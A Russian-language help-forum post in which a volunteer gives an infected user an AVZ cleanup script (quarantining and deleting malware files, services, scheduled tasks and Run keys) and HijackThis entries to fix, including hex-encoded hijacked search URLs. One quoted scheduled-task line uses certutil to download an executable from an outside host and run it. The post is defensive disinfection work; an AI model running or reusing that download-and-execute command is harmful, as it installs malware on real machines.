Ветеран
Консультант
Сообщения: 765
Благодарности: 202
|
Профиль
|
Сайт
|
Отправить PM
| Цитировать
Нахватали.
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
SetServiceStart('Nettrans', 4);
SetServiceStart('TCPSvc', 4);
SetServiceStart('Voyasollam', 4);
SetServiceStart('WinDefender', 4);
QuarantineFileF('c:\windows\rss\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
QuarantineFile('C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE', '');
QuarantineFile('C:\Program Files (x86)\DayByDay\6787991.exe', '');
QuarantineFile('C:\Program Files (x86)\EPVqpVJyVSWU2\kLdzDpguWOneJ.dll', '');
QuarantineFile('C:\Program Files (x86)\JAcqddADqIE\g66RRRr.dll', '');
QuarantineFile('C:\Program Files (x86)\JAcqddADqIE\k8O3geHP3.dll', '');
QuarantineFile('c:\program files (x86)\jacqddadqie\qssvqsgsqj.exe', '');
QuarantineFile('C:\Program Files (x86)\KCGHGVOnU\LzpuOe.dll', '');
QuarantineFile('C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\zrFuZkI.dll', '');
QuarantineFile('C:\Program Files\TTK0EM7F5D\TTK0EM7F5.exe', '');
QuarantineFile('C:\ProgramData\PrefsSecure\Nettrans.exe', '');
QuarantineFile('C:\ProgramData\Voyasollam\Voyasollam.exe', '');
QuarantineFile('c:\users\777\appdata\local\temp\csrss\cloudnet.exe', '');
QuarantineFile('c:\users\777\appdata\local\temp\csrss\proxy\tor\tor.exe', '');
QuarantineFile('C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe', '');
QuarantineFile('C:\Users\777\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe', '');
QuarantineFile('C:\Users\777\AppData\Roaming\zcjri\ozsnk.vbs', '');
QuarantineFile('c:\windows\rss\csrss.exe', '');
QuarantineFile('c:\windows\windefender.exe', '');
DeleteFile('C:\Program Files (x86)\DayByDay\6787991.exe', '32');
DeleteFile('C:\Program Files (x86)\EPVqpVJyVSWU2\kLdzDpguWOneJ.dll', '32');
DeleteFile('C:\Program Files (x86)\JAcqddADqIE\g66RRRr.dll', '32');
DeleteFile('C:\Program Files (x86)\JAcqddADqIE\k8O3geHP3.dll', '32');
DeleteFile('c:\program files (x86)\jacqddadqie\qssvqsgsqj.exe', '32');
DeleteFile('C:\Program Files (x86)\KCGHGVOnU\LzpuOe.dll', '32');
DeleteFile('C:\Program Files (x86)\SvnSzzIscGyUC\WTJfUEt.dll', '32');
DeleteFile('C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\zrFuZkI.dll', '32');
DeleteFile('C:\Program Files\TTK0EM7F5D\TTK0EM7F5.exe', '32');
DeleteFile('C:\ProgramData\PrefsSecure\Nettrans.exe', '32');
DeleteFile('C:\ProgramData\Voyasollam\Voyasollam.exe', '32');
DeleteFile('c:\users\777\appdata\local\temp\csrss\cloudnet.exe', '32');
DeleteFile('C:\Users\777\AppData\Local\Temp\csrss\proxy\Tor\tor.exe', '32');
DeleteFile('C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe', '32');
DeleteFile('C:\Users\777\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe', '32');
DeleteFile('C:\Users\777\AppData\Roaming\vqwqrlmiera\cw5fttprixn.exe', '32');
DeleteFile('C:\Users\777\AppData\Roaming\zcjri\ozsnk.vbs', '32');
DeleteFile('C:\Windows\rss\csrss.exe', '32');
DeleteFile('C:\Windows\system32\Tasks\csrss', '64');
DeleteFile('C:\Windows\system32\Tasks\jbDyCmJOWCzWzi', '64');
DeleteFile('C:\Windows\system32\Tasks\ozsnk', '64');
DeleteFile('C:\Windows\system32\Tasks\RuvZlWnxKNkmGuM2', '64');
DeleteFile('C:\Windows\system32\Tasks\ScheduledUpdate', '64');
DeleteFile('C:\Windows\system32\Tasks\TUZwhpCbnzWcBoUhWSI2', '64');
DeleteFile('C:\Windows\system32\Tasks\wAJDAAZgOBCdyQgsK2', '64');
DeleteFile('C:\Windows\windefender.exe', '32');
DeleteFile('C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE','32');
DeleteFile('C:\Windows\system32\Tasks\FastDataX Task','64');
DeleteService('Nettrans');
DeleteService('TCPSvc');
DeleteService('Voyasollam');
DelBHO('{C0D38E5A-7CF8-4105-8FE8-31B81443A114}');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '7293625');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CloudNet');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CrimsonMorning');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'NEDLMC32E48914Z');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\RunOnce', 'ez1jxpzcudr');
ExecuteRepair(3);
ExecuteRepair(4);
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:
Код: begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код: R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHlsMMN8buNs4WWWYFmbtFw5E-x4MJ55Km8rKJhp3gmj53LLZLtFsZuczC9ErBFJ2m5sYQKXbeFCM4IXKS7t1
R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6
R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6uAMt9CelOLZKhng,,&q={searchTerms}
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch} [url] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6uAMt9CelOLZKhng,,&q={searchTerms} - Search the web
O2-32 - HKLM\..\BHO: (no name) - {2e32cfe5-df92-4ae5-b0be-609ed0df74a6} - (no file)
O3 - HKLM\..\Toolbar: (no name) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - (no file)
O4 - HKCU\..\Run: [NEDLMC32E48914Z] = C:\Program Files\TTK0EM7F5D\TTK0EM7F5.exe
O4 - HKLM\..\RunOnce: [ez1jxpzcudr] = C:\Program Files (x86)\DayByDay\6787991.exe 1 3.1526897736.5b029c48bfeb0
O22 - Task: ScheduledUpdate - C:\Windows\system32\cmd.exe /C certutil.exe -urlcache -split -f http://dp.fastandcoolest.com/app/3/app.exe C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe /31340
O22 - Task: SidebarExecute - C:\Program Files\Windows Sidebar\sidebar.exe "C:\Users\777\AppData\Local\Opera\Opera\temporary_downloads\autoshutdown_sevengadgets.ru.zip"
O22 - Task: jbDyCmJOWCzWzi - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\EPVqpVJyVSWU2\kLdzDpguWOneJ.dll",#1
O22 - Task: ozsnk - C:\Users\777\AppData\Roaming\zcjri\ozsnk.vbs
O22 - Task: wAJDAAZgOBCdyQgsK2 - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\zrFuZkI.dll",#1
- Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.
- Скачайте AdwCleaner и сохраните его на Рабочем столе.
- Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
- Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[S0].txt.
- Прикрепите отчет к своему следующему сообщению.
Подробнее читайте в этом руководстве. |
